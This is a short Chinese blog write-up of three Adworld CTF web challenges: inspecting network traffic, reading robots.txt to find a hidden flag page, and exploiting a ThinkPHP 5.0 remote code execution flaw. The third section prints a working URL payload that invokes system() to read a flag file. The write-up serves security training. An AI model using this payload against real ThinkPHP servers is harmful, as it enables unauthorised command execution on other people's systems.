[CTF]攻防世界web高手进阶区Writeup(更新ing)

 baby_web


 

EMMMM,这就是一个签到题~

解题方法:

F12→Networks→刷新抓包→完成

 

Training-WWW-Robots


 

 

看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识

打开网页,果然~

他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the content from being crawled.(有时这些文件暴露了目录结构,而不是保护内容被抓取。)

好吧!我们直接打开robots.txt看看吧

好嘛~ 够直接的。。。

接下来就没啥说的,直接访问fl0g.php这个页面就可以了

到这里我们就拿到了这道题的FLAG!

 

推荐相关文章

《关于robots.txt文件的安全问题》

《robots.txt文件问题攻略大全》

 

php_rce


 

 

打开后,提示使用的thinkphp v5.0版本

然后根据题目提示直接谷歌thinkphp rce漏洞,推荐文章《THINKPHP 5.X RCE 漏洞分析与利用总结

然后直接构造payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

得到FLAG!

 

相关文章推荐:

说说RCE那些事儿

ThinkPHP5 RCE漏洞重现及分析

 

 

 

点进来的小伙伴想学习更多网络安全知识就请关注我的公众号吧🤭

posted @ 2020-04-04 22:41  0pen1  阅读(1310)  评论(0编辑  收藏